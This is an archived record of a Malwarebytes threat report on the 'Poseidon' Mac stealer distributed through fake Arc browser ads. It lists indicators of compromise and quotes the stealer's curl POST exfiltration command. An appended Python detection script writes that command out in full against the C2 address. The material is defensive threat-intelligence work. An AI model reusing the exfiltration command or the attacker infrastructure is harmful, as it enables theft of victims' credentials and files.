{
	"id": "bc3fd856-cf59-4801-a6f6-9756eebdb556",
	"created_at": "2026-04-06T00:20:13.462185Z",
	"updated_at": "2026-04-10T13:12:12.003251Z",
	"deleted_at": null,
	"sha1_hash": "531984a23b7516401e15e2e500cdc80d27160925",
	"title": "'Poseidon' Mac stealer distributed via Google ads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 702360,
	"plain_text": "'Poseidon' Mac stealer distributed via Google ads\r\nBy Jérôme Segura\r\nPublished: 2024-06-27 · Archived: 2026-04-05 13:01:16 UTC\r\nOn June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for\r\nthe Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure,\r\ncertainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.\r\nThe macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer\r\ncompetitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously\r\ntracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new\r\nproject ‘Poseidon’ and added a few new features such as looting VPN configurations.\r\nIn this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum\r\nannouncement, to the distribution of the new Mac malware via malvertising.\r\nRodrigo4 launches new PR campaign\r\nA threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with\r\nsimilar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel\r\nwith statistics and a builder with custom name, icon and AppleScript. 
The stealer offers functionalities\r\nreminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden,\r\nKeePassXC) stealer, and browser data collector.\r\nIn a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 1 of 6\n\nForum post by Rodrigo4 on XSS\r\nHello everyone, we have released the V4 update and there are quite a lot of new things.\r\nThe very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR\r\nMalware authors do need publicity, but we will try to stick to the facts and what we have observed in active\r\nmalware delivery campaigns.\r\nDistribution via Google ads\r\nWe saw an ad for the Arc browser belonging to ‘Coles \u0026 Co’, linking to the domain name arcthost[.]org:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 2 of 6\n\nMalicious ad for Arc browser via Google search\r\nPeople who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac\r\nonly:\r\nDecoy website for Arc\r\nThe downloaded DMG file resembles what one would expect when installing a new Mac application with the\r\nexception of the right-click to open trick to bypass security protections:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 3 of 6\n\nMalicious Arc DMG installer\r\nConnection to new Poseidon project\r\nThe new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal\r\nVPN configurations from Fortinet and OpenVPN:\r\nExcerpt from forum post featuring new VPN capability\r\nMore interesting is the data exfiltration which is revealed in the following command:\r\nset result_send to (do shell script \\\"curl -X POST -H \\\\\\\"uuid: 
399122bdb9844f7d934631745e22bd06\\\\\\\"\r\nNavigating to this IP address reveals the new Poseidon branded panel:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 4 of 6\n\nPoseidon panel login page\r\nConclusion\r\nThere is an active scene for Mac malware development focused on stealers. As we can see in this post, there are\r\nmany contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that\r\ntheir product is feature-rich and has low detection from antivirus software.\r\nSeeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new\r\nvictims. Staying protected against these threats requires vigilance any time you download and install a new app.\r\nMalwarebytes for Mac will keep detecting this ‘Poseidon campaign as OSX.RodStealer and we have already\r\nshared information related to the malicious ad with Google. We highly recommend using web protection that\r\nblocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both\r\neffectively.\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 5 of 6\n\nIndicators of Compromise\r\nGoogle ad domain\r\narcthost[.]org\r\nDecoy site\r\narc-download[.]com\r\nDownload URL\r\nzestyahhdog[.]com/Arc12645413[.]dmg\r\nPayload SHA256\r\nc1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05\r\nC2\r\n79.137.192[.]4/p2p\r\nSource: https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads"
	],
	"report_names": [
		"poseidon-mac-stealer-distributed-via-google-ads"
	],
	"threat_actors": [],
	"ts_created_at": 1775434813,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/531984a23b7516401e15e2e500cdc80d27160925.pdf",
		"text": "https://archive.orkl.eu/531984a23b7516401e15e2e500cdc80d27160925.txt",
		"img": "https://archive.orkl.eu/531984a23b7516401e15e2e500cdc80d27160925.jpg"
	}
}
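Added example (an editor's addition, not code from the archived Malwarebytes post, from Rodrigo4, or from the ORKL record above): the post's IOC list and the quoted `curl -X POST -H "uuid: <hex>"` exfiltration command can be turned into a small hunting script. The Python below refangs the published indicators, matches them against telemetry lines, and adds one behavioural heuristic derived from the quoted command (a curl POST carrying a 32-character hex `uuid` header). The indicator values are copied from the post's IOC list; the log line formats, the sample lines, the regex and the helper names (`refang`, `check_line`, `scan`) are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# Indicators copied from the post's IOC list, defanged exactly as published.
DEFANGED_IOCS = {
    "ad_domain": "arcthost[.]org",
    "decoy_site": "arc-download[.]com",
    "download_url": "zestyahhdog[.]com/Arc12645413[.]dmg",
    "payload_sha256": "c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05",
    "c2": "79.137.192[.]4/p2p",
}


def refang(value: str) -> str:
    """Reverse the '[.]' / 'hxxp' defanging used in published IOC lists."""
    return value.replace("[.]", ".").replace("hxxp", "http")


# Refanged, lower-cased copies used for matching.
IOCS = {name: refang(v).lower() for name, v in DEFANGED_IOCS.items()}

# Bare hosts pulled out of the URL-style indicators, so a DNS log that only
# records the queried name (no path) still matches.
IOC_HOSTS = {IOCS["ad_domain"], IOCS["decoy_site"],
             IOCS["download_url"].split("/")[0], IOCS["c2"].split("/")[0]}

# Behavioural pattern taken from the exfiltration command quoted in the post:
# an AppleScript 'do shell script' running curl -X POST with a "uuid: <32 hex>"
# header. The regex itself is this example's own heuristic (assumption), not a
# published signature; it tolerates the backslash-escaped quotes in the snippet.
EXFIL_RE = re.compile(
    r"""curl\b.*?-X\s+POST\b.*?-H\s+[\\"']*uuid:\s*[0-9a-f]{32}""", re.IGNORECASE)


@dataclass
class Hit:
    rule: str        # which indicator or heuristic fired
    indicator: str   # the matched value
    line: str        # the telemetry line it fired on


def check_line(line: str) -> list[Hit]:
    """Return every IOC / heuristic hit for one telemetry line."""
    hits: list[Hit] = []
    lower = line.lower()
    for name, ioc in IOCS.items():
        if ioc in lower:
            hits.append(Hit(name, ioc, line))
    # Host-only match (DNS, TLS SNI) unless a fuller URL/host IOC already hit.
    for host in sorted(IOC_HOSTS):
        if host in lower and not any(h.indicator.startswith(host) for h in hits):
            hits.append(Hit("host", host, line))
    if EXFIL_RE.search(line):
        hits.append(Hit("exfil_uuid_header", "curl POST with uuid header", line))
    return hits


def scan(lines: list[str]) -> dict[str, int]:
    """Count hits per rule across a batch of telemetry lines."""
    counts: dict[str, int] = {}
    for line in lines:
        for hit in check_line(line):
            counts[hit.rule] = counts.get(hit.rule, 0) + 1
    return counts


# Constructed sample telemetry (not real logs): a DNS query, a proxy download,
# a file-creation event carrying the payload hash, an EDR process event for the
# exfiltration call, and one benign line that must not fire.
SAMPLE_TELEMETRY = [
    "2024-06-24T10:02:11Z dns query=arc-download.com type=A client=10.0.0.23",
    "2024-06-24T10:03:40Z proxy method=GET url=https://zestyahhdog.com/Arc12645413.dmg bytes=8421376",
    "2024-06-24T10:04:15Z fs event=create path=/Users/jdoe/Downloads/Arc12645413.dmg "
    "sha256=c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05",
    '2024-06-24T10:05:02Z edr proc=osascript cmd=do shell script "curl -X POST '
    '-H \\"uuid: 399122bdb9844f7d934631745e22bd06\\" http://79.137.192.4/p2p"',
    "2024-06-24T10:06:00Z proxy method=GET url=https://arc.net/download bytes=1024",
]

if __name__ == "__main__":
    for line in SAMPLE_TELEMETRY:
        for hit in check_line(line):
            print(f"{hit.rule:18} {hit.indicator:40} {line[:60]}")
    print(scan(SAMPLE_TELEMETRY))
```

The host-only branch exists because DNS and SNI telemetry never show the `/p2p` path or the DMG filename; the suppression check keeps one event from being reported twice when the fuller URL indicator already matched. The `uuid` header heuristic is deliberately independent of the C2 address, so a rebuilt sample pointing at a new panel would still be flagged if the exfiltration routine is unchanged.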